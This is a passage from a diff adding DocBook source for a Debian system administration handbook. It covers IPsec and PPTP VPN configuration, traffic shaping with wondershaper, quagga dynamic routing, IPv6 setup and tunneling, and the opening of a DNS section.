+      conditions by altering timeout delays. The following site describes
+      the problem in more detail: <ulink type="block" url="http://sites.inka.de/sites/bigred/devel/tcp-tcp.html" /> VPNs
+      over SSH should therefore be restricted to one-off tunnels with no
+      performance constraints.</para>
+    </section>
+    <section id="sect.ipsec">
+      <title>IPsec</title>
+      <indexterm><primary>IPsec</primary></indexterm>
+      <indexterm><primary><command>strongswan</command></primary></indexterm>
+      <indexterm><primary><command>racoon</command></primary></indexterm>
+
+      <para>IPsec, despite being the standard in IP VPNs, is rather more
+      involved in its implementation. The IPsec engine itself is integrated
+      in the Linux kernel; the required user-space parts, the control and
+      configuration tools, are provided by the <emphasis role="pkg">ipsec-tools</emphasis> package. In concrete terms, each
+      host's <filename>/etc/ipsec-tools.conf</filename> contains the
+      parameters for <emphasis>IPsec tunnels</emphasis> (or
+      <emphasis>Security Associations</emphasis>, in the IPsec terminology)
+      that the host is concerned with;
+      the <command>/etc/init.d/setkey</command> script provides a way to start
+      and stop a tunnel (each tunnel is a secure link to another host
+      connected to the virtual private network). This file can be built by
+      hand from the documentation provided by the
+      <citerefentry><refentrytitle>setkey</refentrytitle>
+      <manvolnum>8</manvolnum></citerefentry> manual page. However,
+      explicitly writing the parameters for all hosts in a non-trivial set
+      of machines quickly becomes an arduous task, since the number of
+      tunnels grows fast. Installing an IKE daemon (for <emphasis>IPsec Key
+      Exchange</emphasis>) such as <emphasis role="pkg">racoon</emphasis> or
+      <emphasis role="pkg">strongswan</emphasis> makes the process much simpler by
+      bringing administration together at a central point, and more secure
+      by rotating the keys periodically.
+      </para>
+      <indexterm><primary>IKE</primary></indexterm>
+      <indexterm><primary>IPsec</primary><secondary>IPsec Key Exchange</secondary></indexterm>
+      <indexterm><primary>key pair</primary></indexterm>
+      <indexterm><primary><command>setkey</command></primary></indexterm>
+
+      <para>In spite of its status as the reference, the complexity of
+      setting up IPsec restricts its usage in practice. OpenVPN-based
+      solutions will generally be preferred when the required tunnels are
+      neither too many nor too dynamic.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> IPsec and NAT</title>
+
+	<para>NATing firewalls and IPsec do not work well together: since
+	IPsec signs the packets, any change on these packets that the
+	firewall might perform will void the signature, and the packets
+	will be rejected at their destination. Various IPsec
+	implementations now include the <emphasis>NAT-T</emphasis>
+	technique (for <emphasis>NAT Traversal</emphasis>), which basically
+	encapsulates the IPsec packet within a standard UDP packet.</para>
+        <indexterm><primary>NAT-T</primary></indexterm>
+        <indexterm><primary>NAT Traversal</primary></indexterm>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>SECURITY</emphasis> IPsec and firewalls</title>
+
+	<para>The standard mode of operation of IPsec involves data
+	exchanges on UDP port 500 for key exchanges (also on UDP
+	port 4500 in the case that NAT-T is in use). Moreover, IPsec packets use
+	two dedicated IP protocols that the firewall must let through;
+	reception of these packets is based on their protocol numbers, 50
+	(ESP) and 51 (AH).</para>
+        <indexterm><primary>ESP, protocol</primary></indexterm>
+        <indexterm><primary>AH, protocol</primary></indexterm>
+        <indexterm><primary>protocol</primary><secondary>AH</secondary></indexterm>
+        <indexterm><primary>protocol</primary><secondary>ESP</secondary></indexterm>
+      </sidebar>
+    </section>
+    <section id="sect.pptp">
+      <title>PPTP</title>
+
+      <para>PPTP (for <emphasis>Point-to-Point Tunneling
+      Protocol</emphasis>) uses two communication channels, one for control
+      data and one for payload data; the latter uses the GRE protocol
+      (<emphasis>Generic Routing Encapsulation</emphasis>). A standard PPP
+      link is then set up over the data exchange channel.</para>
+      <indexterm><primary>PPTP</primary></indexterm>
+      <indexterm><primary>Point-to-Point Tunneling Protocol</primary></indexterm>
+      <indexterm><primary>GRE, protocol</primary></indexterm>
+      <indexterm><primary>protocol</primary><secondary>GRE</secondary></indexterm>
+      <section id="sect.pptp-config-client">
+        <title>Configuring the Client</title>
+
+	<para>The <emphasis role="pkg">pptp-linux</emphasis> package
+	contains an easily-configured PPTP client for Linux. The following
+	instructions take their inspiration from the official
+	documentation: <ulink type="block" url="http://pptpclient.sourceforge.net/howto-debian.phtml" /></para>
+        <indexterm><primary><emphasis role="pkg">pptp-linux</emphasis></primary></indexterm>
+
+	<para>The Falcot administrators created several files:
+	<filename>/etc/ppp/options.pptp</filename>,
+	<filename>/etc/ppp/peers/falcot</filename>,
+	<filename>/etc/ppp/ip-up.d/falcot</filename>, and
+	<filename>/etc/ppp/ip-down.d/falcot</filename>.</para>
+
+        <example id="example.ppp-options.pptp">
+          <title>The <filename>/etc/ppp/options.pptp</filename> file</title>
+
+          <programlisting>
+# PPP options used for a PPTP connection
+lock
+noauth
+nobsdcomp
+nodeflate
+</programlisting>
+        </example>
+
+        <example id="example.ppp-peers-falcot">
+          <title>The <filename>/etc/ppp/peers/falcot</filename> file</title>
+
+          <programlisting>
+# vpn.falcot.com is the PPTP server
+pty "pptp vpn.falcot.com --nolaunchpppd"
+# the connection will identify as the "vpn" user
+user vpn
+remotename pptp
+# encryption is needed
+require-mppe-128
+file /etc/ppp/options.pptp
+ipparam falcot
+</programlisting>
+        </example>
+
+        <example id="example.ppp-ip-up.d-falcot">
+          <title>The <filename>/etc/ppp/ip-up.d/falcot</filename> file</title>
+
+          <programlisting>
+# Create the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route add -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</programlisting>
+        </example>
+
+        <example id="example.ppp-ip-down.d-falcot">
+          <title>The <filename>/etc/ppp/ip-down.d/falcot</filename> file</title>
+
+          <programlisting>
+# Delete the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route del -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</programlisting>
+        </example>
+
+        <sidebar>
+          <title><emphasis>SECURITY</emphasis> MPPE</title>
+
+	  <para>Securing PPTP involves using the MPPE feature
+	  (<emphasis>Microsoft Point-to-Point Encryption</emphasis>), which
+	  is available in official Debian kernels as a module.</para>
+          <indexterm><primary>MPPE</primary></indexterm>
+          <indexterm><primary>Microsoft</primary><secondary>Point-to-Point Encryption</secondary></indexterm>
+        </sidebar>
+      </section>
+      <section id="sect.pptp-config-serveur">
+        <title>Configuring the Server</title>
+
+        <sidebar>
+          <title><emphasis>CAUTION</emphasis> PPTP and firewalls</title>
+
+	  <para>Intermediate firewalls need to be configured to let through
+	  IP packets using protocol 47 (GRE). Moreover, the PPTP server's
+	  port 1723 needs to be open so that the communication channel can
+	  happen.</para>
+        </sidebar>
+
+	<para><command>pptpd</command> is the PPTP server for Linux. Its
+	main configuration file, <filename>/etc/pptpd.conf</filename>,
+	requires very few changes: <emphasis>localip</emphasis> (local IP
+	address) and <emphasis>remoteip</emphasis> (remote IP address). In
+	the example below, the PPTP server always uses the
+	<literal>192.168.0.199</literal> address, and PPTP clients receive
+	IP addresses from <literal>192.168.0.200</literal> to
+	<literal>192.168.0.250</literal>.</para>
+
+        <example id="example.pptpd.conf">
+          <title>The <filename>/etc/pptpd.conf</filename> file</title>
+
+          <programlisting>
+# TAG: speed
+#
+#       Specifies the speed for the PPP daemon to talk at.
+#
+speed 115200
+
+# TAG: option
+#
+#       Specifies the location of the PPP options file.
+#       By default PPP looks in '/etc/ppp/options'
+#
+option /etc/ppp/pptpd-options
+
+# TAG: debug
+#
+#       Turns on (more) debugging to syslog
+#
+# debug
+
+# TAG: localip
+# TAG: remoteip
+#
+#       Specifies the local and remote IP address ranges.
+#
+#       You can specify single IP addresses separated by commas or you can
+#       specify ranges, or both. For example:
+#
+#               192.168.0.234,192.168.0.245-249,192.168.0.254
+#
+#       IMPORTANT RESTRICTIONS:
+#
+#       1. No spaces are permitted between commas or within addresses.
+#
+#       2. If you give more IP addresses than MAX_CONNECTIONS, it will
+#          start at the beginning of the list and go until it gets
+#          MAX_CONNECTIONS IPs. Others will be ignored.
+#
+#       3. No shortcuts in ranges! ie. 234-8 does not mean 234 to 238,
+#          you must type 234-238 if you mean this.
+#
+#       4. If you give a single localIP, that's ok - all local IPs will
+#          be set to the given one. You MUST still give at least one remote
+#          IP for each simultaneous client.
+#
+#localip 192.168.0.234-238,192.168.0.245
+#remoteip 192.168.1.234-238,192.168.1.245
+#localip 10.0.1.1
+#remoteip 10.0.1.2-100
+localip 192.168.0.199
+remoteip 192.168.0.200-250
+</programlisting>
+        </example>
+
+	<para>The PPP configuration used by the PPTP server also requires a
+	few changes in <filename>/etc/ppp/pptpd-options</filename>. The
+	important parameters are the server name (<literal>pptp</literal>),
+	the domain name (<literal>falcot.com</literal>), and the IP
+	addresses for DNS and WINS servers.</para>
+
+        <example id="example.ppp-pptpd-options">
+          <title>The <filename>/etc/ppp/pptpd-options</filename> file</title>
+
+          <programlisting>
+## turn pppd syslog debugging on
+#debug
+
+## change 'servername' to whatever you specify as your server name in chap-secrets
+name pptp
+## change the domainname to your local domain
+domain falcot.com
+
+## these are reasonable defaults for WinXXXX clients
+## for the security related settings
+# The Debian pppd package now supports both MSCHAP and MPPE, so enable them
+# here. Please note that the kernel support for MPPE must also be present!
+auth
+require-chap
+require-mschap
+require-mschap-v2
+require-mppe-128
+
+## Fill in your addresses
+ms-dns 192.168.0.1
+ms-wins 192.168.0.1
+
+## Fill in your netmask
+netmask 255.255.255.0
+
+## some defaults
+nodefaultroute
+proxyarp
+lock
+</programlisting>
+        </example>
+
+	<para>The last step involves registering the <literal>vpn</literal>
+	user (and the associated password) in the
+	<filename>/etc/ppp/chap-secrets</filename> file. Contrary to other
+	instances where an asterisk (<literal>*</literal>) would work, the
+	server name must be filled explicitly here. Furthermore, Windows
+	PPTP clients identify themselves under the
+	<literal><replaceable>DOMAIN</replaceable>\\<replaceable>USER</replaceable></literal>
+	form, instead of only providing a user name. This explains why the
+	file also mentions the <literal>FALCOT\\vpn</literal> user. It is
+	also possible to specify individual IP addresses for users; an
+	asterisk in this field specifies that dynamic addressing should be
+	used.</para>
+
+        <example id="example.ppp-chap-secrets">
+          <title>The <filename>/etc/ppp/chap-secrets</filename> file</title>
+
+          <programlisting>
+# Secrets for authentication using CHAP
+# client        server  secret      IP addresses
+vpn             pptp    f@Lc3au     *
+FALCOT\\vpn     pptp    f@Lc3au     *
+</programlisting>
+        </example>
+
+        <sidebar>
+          <title><emphasis>SECURITY</emphasis> PPTP vulnerabilities</title>
+
+	  <para>Microsoft's first PPTP implementation drew severe criticism
+	  because it had many security vulnerabilities; most have since
+	  then been fixed in more recent versions. The configuration
+	  documented in this section uses the latest version of the
+	  protocol. Be aware though that removing some options (such as
+	  <literal>require-mppe-128</literal> and
+	  <literal>require-mschap-v2</literal>) would make the service
+	  vulnerable again.</para>
+        </sidebar>
+      </section>
+    </section>
+  </section>
+  <section id="sect.quality-of-service">
+    <title>Quality of Service</title>
+    <section id="sect.qos-principe">
+      <title>Principle and Mechanism</title>
+
+      <para><emphasis>Quality of Service</emphasis> (or
+      <emphasis>QoS</emphasis> for short) refers to a set of techniques
+      that guarantee or improve the quality of the service provided to
+      applications. The most popular such technique involves classifying
+      the network traffic into categories, and differentiating the handling
+      of traffic according to which category it belongs to. The main
+      application of this differentiated services concept is
+      <emphasis>traffic shaping</emphasis>, which limits the data
+      transmission rates for connections related to some services and/or
+      hosts so as not to saturate the available bandwidth and starve
+      important other services. Traffic shaping is a particularly good fit
+      for TCP traffic, since this protocol automatically adapts to
+      available bandwidth.</para>
+      <indexterm><primary>QoS</primary></indexterm>
+      <indexterm><primary>quality of service</primary></indexterm>
+      <indexterm><primary>quality</primary><secondary>of service</secondary></indexterm>
+      <indexterm><primary>service</primary><secondary>quality</secondary></indexterm>
+
+      <para>It is also possible to alter the priorities on traffic, which
+      allows prioritizing packets related to interactive services (such as
+      <command>ssh</command> and <command>telnet</command>) or to services
+      that only deal with small blocks of data.</para>
+
+      <para>The Debian kernels include the features required for QoS along
+      with their associated modules. These modules are many, and each of
+      them provides a different service, most notably by way of special
+      schedulers for the queues of IP packets; the wide range of available
+      scheduler behaviors spans the whole range of possible
+      requirements.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> LARTC — <emphasis>Linux Advanced Routing &amp; Traffic Control</emphasis></title>
+
+	<para>The <emphasis>Linux Advanced Routing &amp; Traffic
+	Control</emphasis> HOWTO is the reference document covering
+	everything there is to know about network quality of service.
+	<ulink type="block" url="http://www.lartc.org/howto/" /></para>
+        <indexterm><primary>routing</primary><secondary>advanced</secondary></indexterm>
+        <indexterm><primary>traffic</primary><secondary>control</secondary></indexterm>
+        <indexterm><primary>control of traffic</primary></indexterm>
+      </sidebar>
+    </section>
+    <section id="sect.qos-config">
+      <title>Configuring and Implementing</title>
+
+      <para>QoS parameters are set through the <command>tc</command>
+      command (provided by the <emphasis role="pkg">iproute</emphasis>
+      package). Since its interface is quite complex, using higher-level
+      tools is recommended.</para>
+      <indexterm><primary><emphasis>iproute</emphasis></primary></indexterm>
+      <indexterm><primary><command>tc</command></primary></indexterm>
+      <section id="sect.qos-wondershaper">
+        <title>Reducing Latencies: <command>wondershaper</command></title>
+
+	<para>The main purpose of <command>wondershaper</command> (in the
+	similarly-named package) is to minimize latencies independent of
+	network load. This is achieved by limiting total traffic to a value
+	that falls just short of the link saturation value.</para>
+        <indexterm><primary><command>wondershaper</command></primary></indexterm>
+        <indexterm><primary>limitation of traffic</primary></indexterm>
+        <indexterm><primary>traffic</primary><secondary>limitation</secondary></indexterm>
+
+	<para>Once a network interface is configured, setting up this
+	traffic limitation is achieved by running <command>wondershaper
+	<replaceable>interface</replaceable>
+	<replaceable>download_rate</replaceable>
+	<replaceable>upload_rate</replaceable></command>. The interface can
+	be <literal>eth0</literal> or <literal>ppp0</literal> for example,
+	and both rates are expressed in kilobits per second. The
+	<command>wondershaper remove
+	<replaceable>interface</replaceable></command> command disables
+	traffic control on the specified interface.</para>
+
+	<para>For an Ethernet connection, this script is best called right
+	after the interface is configured. This is done by adding
+	<literal>up</literal> and <literal>down</literal> directives to the
+	<filename>/etc/network/interfaces</filename> file allowing declared
+	commands to be run, respectively, after the interface is configured
+	and before it is deconfigured. For example:</para>
+
+        <example id="example.network-interfaces">
+          <title>Changes in the <filename>/etc/network/interfaces</filename> file</title>
+
+          <programlisting>
+iface eth0 inet dhcp
+    up /sbin/wondershaper eth0 500 100
+    down /sbin/wondershaper remove eth0
+</programlisting>
+        </example>
+
+	<para>In the PPP case, creating a script that calls
+	<command>wondershaper</command> in
+	<filename>/etc/ppp/ip-up.d/</filename> will enable traffic control
+	as soon as the connection is up.</para>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> Optimal configuration</title>
+
+	  <para>The
+	  <filename>/usr/share/doc/wondershaper/README.Debian.gz</filename>
+	  file describes, in some detail, the configuration method
+	  recommended by the package maintainer. In particular, it advises
+	  measuring the download and upload speeds so as to best evaluate
+	  real limits.</para>
+        </sidebar>
+      </section>
+      <section id="sect.qos-config-standard">
+        <title>Standard Configuration</title>
+
+	<para>Barring a specific QoS configuration, the Linux kernel uses
+	the <literal>pfifo_fast</literal> queue scheduler, which provides a
+	few interesting features by itself. The priority of each processed
+	IP packet is based on the ToS field (<emphasis>Type of
+	Service</emphasis>) of this packet; modifying this field is enough
+	to take advantage of the scheduling features. There are five
+	possible values:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>Normal-Service (0);</para>
+          </listitem>
+          <listitem>
+	    <para>Minimize-Cost (2);</para>
+          </listitem>
+          <listitem>
+	    <para>Maximize-Reliability (4);</para>
+          </listitem>
+          <listitem>
+	    <para>Maximize-Throughput (8);</para>
+          </listitem>
+          <listitem>
+	    <para>Minimize-Delay (16).</para>
+          </listitem>
+        </itemizedlist>
+        <indexterm><primary>ToS</primary></indexterm>
+        <indexterm><primary>Type of Service</primary></indexterm>
+
+	<para>The ToS field can be set by applications that generate IP
+	packets, or modified on the fly by <emphasis>netfilter</emphasis>.
+	The following rules are sufficient to increase responsiveness for a
+	server's SSH service:</para>
+
+        <programlisting role="scale">
+iptables -t mangle -A PREROUTING -p tcp --sport ssh -j TOS --set-tos Minimize-Delay
+iptables -t mangle -A PREROUTING -p tcp --dport ssh -j TOS --set-tos Minimize-Delay
+</programlisting>
+      </section>
+    </section>
+  </section>
+  <section id="sect.dynamic-routing">
+    <title>Dynamic Routing</title>
+    <indexterm><primary>routing</primary><secondary>dynamic</secondary></indexterm>
+    <indexterm><primary><command>quagga</command></primary></indexterm>
+    <indexterm><primary><command>zebra</command></primary></indexterm>
+
+    <para>The reference tool for dynamic routing is currently
+    <command>quagga</command>, from the similarly-named package; it used to
+    be <command>zebra</command> until development of the latter stopped.
+    However, <command>quagga</command> kept the names of the programs for
+    compatibility reasons which explains the <command>zebra</command>
+    commands below.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Dynamic routing</title>
+
+      <para>Dynamic routing allows routers to adjust, in real time, the
+      paths used for transmitting IP packets. Each protocol involves its
+      own method of defining routes (shortest path, use routes advertised
+      by peers, and so on).</para>
+
+      <para>In the Linux kernel, a route links a network device to a set of
+      machines that can be reached through this device. The
+      <command>route</command> command defines new routes and displays
+      existing ones.</para>
+      <indexterm><primary><command>route</command></primary></indexterm>
+    </sidebar>
+
+    <para>Quagga is a set of daemons cooperating to define the routing
+    tables to be used by the Linux kernel; each routing protocol (most
+    notably BGP, OSPF and RIP) provides its own daemon. The
+    <command>zebra</command> daemon collects information from other daemons
+    and handles static routing tables accordingly. The other daemons are
+    known as <command>bgpd</command>, <command>ospfd</command>,
+    <command>ospf6d</command>, <command>ripd</command>, 
+    <command>ripngd</command>, <command>isisd</command>, and
+    <command>babeld</command>.</para>
+    <indexterm><primary>OSPF</primary></indexterm>
+    <indexterm><primary>BGP</primary></indexterm>
+    <indexterm><primary>RIP</primary></indexterm>
+    <indexterm><primary>IS-IS</primary></indexterm>
+    <indexterm><primary>BABEL wireless mesh routing</primary></indexterm>
+    <indexterm><primary><command>bgpd</command></primary></indexterm>
+    <indexterm><primary><command>ospfd</command></primary></indexterm>
+    <indexterm><primary><command>ospf6d</command></primary></indexterm>
+    <indexterm><primary><command>ripd</command></primary></indexterm>
+    <indexterm><primary><command>ripngd</command></primary></indexterm>
+    <indexterm><primary><command>isisd</command></primary></indexterm>
+    <indexterm><primary><command>babeld</command></primary></indexterm>
+
+    <para>Daemons are enabled by editing the
+    <filename>/etc/quagga/daemons</filename> file and creating the
+    appropriate configuration file in <filename>/etc/quagga/</filename>;
+    this configuration file must be named after the daemon, with a
+    <filename>.conf</filename> extension, and belong to the
+    <literal>quagga</literal> user and the <literal>quaggavty</literal>
+    group, in order for the <filename>/etc/init.d/quagga</filename> script
+    to invoke the daemon.</para>
+
+    <para>The configuration of each of these daemons requires knowledge of
+    the routing protocol in question. These protocols cannot be described
+    in detail here, but the <emphasis role="pkg">quagga-doc</emphasis>
+    provides ample explanation in the form of an <command>info</command>
+    file. The same contents may be more easily browsed as HTML on the
+    Quagga website: <ulink type="block" url="http://www.nongnu.org/quagga/docs/docs-info.html" /></para>
+
+    <para>In addition, the
+    syntax is very close to a standard router's configuration interface,
+    and network administrators will adapt quickly to
+    <command>quagga</command>.</para>
+
+    <sidebar>
+      <title><emphasis>IN PRACTICE</emphasis> OSPF, BGP or RIP?</title>
+
+      <para>OSPF is generally the best protocol to use for dynamic routing
+      on private networks, but BGP is more common for Internet-wide
+      routing. RIP is rather ancient, and hardly used anymore.</para>
+    </sidebar>
+  </section>
+  <section id="sect.ipv6">
+    <title>IPv6</title>
+
+    <para>IPv6, successor to IPv4, is a new version of the IP protocol
+    designed to fix its flaws, most notably the scarcity of available IP
+    addresses. This protocol handles the network layer; its purpose is to
+    provide a way to address machines, to convey data to their intended
+    destination, and to handle data fragmentation if needed (in other
+    words, to split packets into chunks with a size that depends on the
+    network links to be used on the path and to reassemble the chunks in
+    their proper order on arrival).</para>
+
+    <para>Debian kernels include IPv6 handling in the core kernel (with
+    the exception of some architectures that have it compiled as a module
+    named <literal>ipv6</literal>). Basic tools such as <command>ping</command> and
+    <command>traceroute</command> have their IPv6 equivalents in
+    <command>ping6</command> and <command>traceroute6</command>, available
+    respectively in the <emphasis role="pkg">iputils-ping</emphasis> and
+    <emphasis role="pkg">iputils-tracepath</emphasis> packages.</para>
+    <indexterm><primary>IPv6</primary></indexterm>
+    <indexterm><primary><emphasis role="pkg">iputils-ping</emphasis></primary></indexterm>
+    <indexterm><primary><emphasis role="pkg">iputils-tracepath</emphasis></primary></indexterm>
+
+    <para>The IPv6 network is configured similarly to IPv4, in
+    <filename>/etc/network/interfaces</filename>. But if you want that
+    network to be globally available, you must ensure that you have an
+    IPv6-capable router relaying traffic to the global IPv6 network.</para>
+
+    <example id="example.network-interfaces-ipv6">
+      <title>Example of IPv6 configuration</title>
+
+      <programlisting>
+iface eth0 inet6 static
+    address 2001:db8:1234:5::1:1
+    netmask 64
+    # Disabling auto-configuration
+    # autoconf 0
+    # The router is auto-configured and has no fixed address
+    # (accept_ra 1). If it had:
+    # gateway 2001:db8:1234:5::1
+</programlisting>
+    </example>
+
+    <para>IPv6 subnets usually have a netmask of 64 bits. This means that
+    2<superscript>64</superscript> distinct addresses exist within the
+    subnet. This allows Stateless Address Autoconfiguration
+    (<acronym>SLAAC</acronym>) to pick an address based on the
+    network interface's MAC address. By default, if <acronym>SLAAC</acronym>
+    is activated in your network and IPv6 on your computer, the kernel will
+    automatically find IPv6 routers and configure the network
+    interfaces.</para>
+
+    <para>This behavior may have privacy implications. If you switch
+    networks frequently, e.g. with a laptop, you might not want your
+    <acronym>MAC</acronym> address being a part of your public IPv6
+    address. This makes it easy to identify the same device across
+    networks. A solution to this are IPv6 privacy extensions (which Debian
+    enables by default if IPv6 connectivity is detected during initial
+    installation), which will assign an additional randomly generated
+    address to the interface,
+    periodically change them and prefer them for outgoing connections.
+    Incoming connections can still use the address generated by SLAAC.
+    The following example, for use in
+    <filename>/etc/network/interfaces</filename>, activates these
+    privacy extensions.</para>
+
+    <example id="example.network-interface-ipv6-privext">
+      <title>IPv6 privacy extensions</title>
+
+      <programlisting>
+iface eth0 inet6 auto
+    # Prefer the randomly assigned addresses for outgoing connections.
+    privext 2
+</programlisting>
+    </example>
+
+    <sidebar>
+      <title><emphasis>TIP</emphasis> Programs built with IPv6</title>
+
+      <para>Many pieces of software need to be adapted to handle IPv6. Most
+      of the packages in Debian have been adapted already, but
+      not all. If your favorite package does not work with IPv6
+      yet, you can ask for help on the <emphasis>debian-ipv6</emphasis>
+      mailing-list. They might know about an IPv6-aware replacement
+      and could file a bug to get the issue properly tracked.
+      <ulink type="block" url="http://lists.debian.org/debian-ipv6/" /></para>
+    </sidebar>
+
+    <indexterm><primary>IPv6 firewall</primary></indexterm>
+    <indexterm><primary>firewall</primary><secondary>IPv6</secondary></indexterm>
+    <indexterm><primary><command>ip6tables</command></primary></indexterm>
+    <para>
+    IPv6 connections can be restricted, in the same fashion as for IPv4:
+    the standard Debian kernels include an adaptation of
+    <emphasis>netfilter</emphasis> for IPv6. This IPv6-enabled
+    <emphasis>netfilter</emphasis> is configured in a similar fashion to
+    its IPv4 counterpart, except the program to use is
+    <command>ip6tables</command> instead of
+    <command>iptables</command>.</para>
+
+    <section id="sect.ipv6-tunneling">
+      <title>Tunneling</title>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> IPv6 tunneling and firewalls</title>
+
+        <para>IPv6 tunneling over IPv4 (as opposed to native IPv6) requires the
+        firewall to accept the traffic, which uses IPv4 protocol number 41.</para>
+      </sidebar>
+
+      <para>If a native IPv6 connection is not available, the fallback method
+      is to use a tunnel over IPv4. Gogo6 is one (free) provider of such
+      tunnels: <ulink type="block" url="http://www.gogo6.com/freenet6/tunnelbroker" /></para>
+      <indexterm><primary>Freenet6</primary></indexterm>
+      <indexterm><primary>Gogo6</primary></indexterm>
+
+      <para>To use a Freenet6 tunnel, you need to register for a Freenet6
+      Pro account on the website, then install the <emphasis role="pkg">gogoc</emphasis> package and configure the tunnel. This
+      requires editing the <filename>/etc/gogoc/gogoc.conf</filename>
+      file: <literal>userid</literal> and <literal>password</literal>
+      lines received by e-mail should be added, and
+      <literal>server</literal> should be replaced with
+      <literal>authenticated.freenet6.net</literal>.</para>
+
+      <para>IPv6 connectivity is proposed to all machines on a local network
+      by adding the three following directives to the
+      <filename>/etc/gogoc/gogoc.conf</filename> file (assuming the local
+      network is connected to the eth0 interface):</para>
+
+      <programlisting>
+host_type=router
+prefixlen=56
+if_prefix=eth0
+</programlisting>
+
+      <para>The machine then becomes the access router for a subnet with a
+      56-bit prefix. Once the tunnel is aware of this change, the local
+      network must be told about it; this implies installing the
+      <command>radvd</command> daemon (from the similarly-named package).
+      This IPv6 configuration daemon has a role similar to
+      <command>dhcpd</command> in the IPv4 world.</para>
+
+      <para>The <filename>/etc/radvd.conf</filename> configuration file must
+      then be created (see
+      <filename>/usr/share/doc/radvd/examples/simple-radvd.conf</filename> as
+      a starting point). In our case, the only required change is the prefix,
+      which needs to be replaced with the one provided by Freenet6; it can be
+      found in the output of the <command>ifconfig</command> command, in the
+      block concerning the <literal>tun</literal> interface.</para>
+      <indexterm><primary><command>radvd</command></primary></indexterm>
+
+      <para>Then run <command>service gogoc restart</command> and
+      <command>service radvd start</command>, and the IPv6 network should
+      work.</para>
+    </section>
+
+  </section>
+  <section id="sect.domain-name-servers">
+    <title>Domain Name Servers (DNS)</title>
+    <section id="sect.dns-principe">
+      <title>Principle and Mechanism</title>
+      <indexterm><primary>DNS</primary></indexterm>
+      <indexterm><primary>server</primary><secondary>name</secondary></indexterm>
+
+      <para>The <emphasis>Domain Name Service</emphasis> (DNS) is a
+      fundamental component of the Internet: it maps host names to IP
+      addresses (and vice-versa), which allows the use of
+      <literal>www.debian.org</literal> instead of
+      <literal>5.153.231.4</literal> or <literal>2001:41c8:1000:21::21:4</literal>.</para>
+
+      <para>DNS records are organized in zones; each zone matches either a
+      domain (or a subdomain) or an IP address range (since IP addresses
+      are generally allocated in consecutive ranges). A primary server is
+      authoritative on the contents of a zone; secondary servers, usually
+      hosted on separate machines, provide regularly refreshed copies of
+      the primary zone.</para>
+      <indexterm><primary>zone</primary><secondary>DNS</secondary></indexterm>
+      <indexterm><primary>DNS</primary><secondary>zone</secondary></indexterm>
+
+      <para>Each zone can contain records of various kinds
+      (<emphasis>Resource Records</emphasis>):</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>A</literal>: IPv4 address. <indexterm><primary>A,
+	  DNS record</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>CNAME</literal>: alias (<emphasis>canonical
+	  name</emphasis>). <indexterm><primary>CNAME, DNS
+	  record</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>MX</literal>: <emphasis>mail exchange</emphasis>,
+	  an email server. This information is used by other email servers
+	  to find where to send email addressed to a given address. Each MX
+	  record has a priority. The highest-priority server (with the
+	  lowest number) is tried first (see sidebar <xref linkend="sidebar.smtp" />); other servers are contacted in order
+	  of decreasing priority if the first one does not reply.
+	  <indexterm><primary>MX</primary><secondary>DNS
+	  record</secondary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>PTR</literal>: mapping of an IP address to a name.
+	  Such a record is stored in a “reverse DNS” zone named after
+	  the IP address range. For example,
+	  <literal>1.168.192.in-addr.arpa</literal> is the zone containing
+	  the reverse mapping for all addresses in the
+	  <literal>192.168.1.0/24</literal> range. <indexterm><primary>PTR,
+	  DNS record</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>AAAA</literal>: IPv6 address.
+	  <indexterm><primary>AAAA, DNS record</primary></indexterm></para>
+        </listitem>
+        <listitem>
+	  <para><literal>NS</literal>: maps a name to a name server. Each
+	  domain must have at least one NS record. These records point at a
+	  DNS server that can answer queries concerning this domain; they
+	  usually point at the primary and secondary servers for the
+	  domain. These records also allow DNS delegation; for instance,
+	  the <literal>falcot.com</literal> zone can include an NS record
+	  for <literal>internal.falcot.com</literal>, which means that the
+	  <literal>internal.falcot.com</literal> zone is handled by another
+	  server. Of course, this server must declare an
+	  <literal>internal.falcot.com</literal> zone.
+	  <indexterm><primary>NS, DNS record</primary></indexterm></para>
+        </listitem>
+      </itemizedlist>
+      
+      <indexterm><primary>record</primary><secondary>DNS</secondary></indexterm>
+      <indexterm><primary>DNS record</primary></indexterm>
+
+      <para>The reference name server, Bind, was developed and is
+      maintained by ISC (<emphasis>Internet Software
+      Consortium</emphasis>). It is provided in Debian by the <emphasis role="pkg">bind9</emphasis> package. Version 9 brings two major
+      changes compared to previous versions. First, the DNS server can now
+      run under an unprivileged user, so that a security vulnerability in
+      the server does not grant root privileges to the attacker (as was
+      seen repeatedly with versions 8.x).</para>
+
+      <para>Furthermore, Bind supports the DNSSEC standard for signing (and
+      therefore authenticating) DNS records, which allows blocking any
+      spoofing of this data during man-in-the-middle attacks.</para>
+      <indexterm><primary><emphasis role="pkg">bind9</emphasis></primary></indexterm>
+      <indexterm><primary>ISC</primary></indexterm>
+      <indexterm><primary>Internet Software Consortium</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> DNSSEC</title>
+        <indexterm><primary>DNSSEC</primary></indexterm>
+
+	<para>The DNSSEC norm is quite complex; this partly explains why
+	it is not in widespread usage yet (even if it perfectly coexists
+	with DNS servers unaware of DNSSEC). To understand all the ins and
+	outs, you should check the following article. <ulink type="block" url="http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions" /></para>
+      </sidebar>
+    </section>
+    <section id="sect.dns-config">
+      <title>Configuring</title>
+
+      <para>Configuration files for <command>bind</command>, irrespective
+      of version, have the same structure.</para>
+
+      <para>The Falcot administrators created a primary
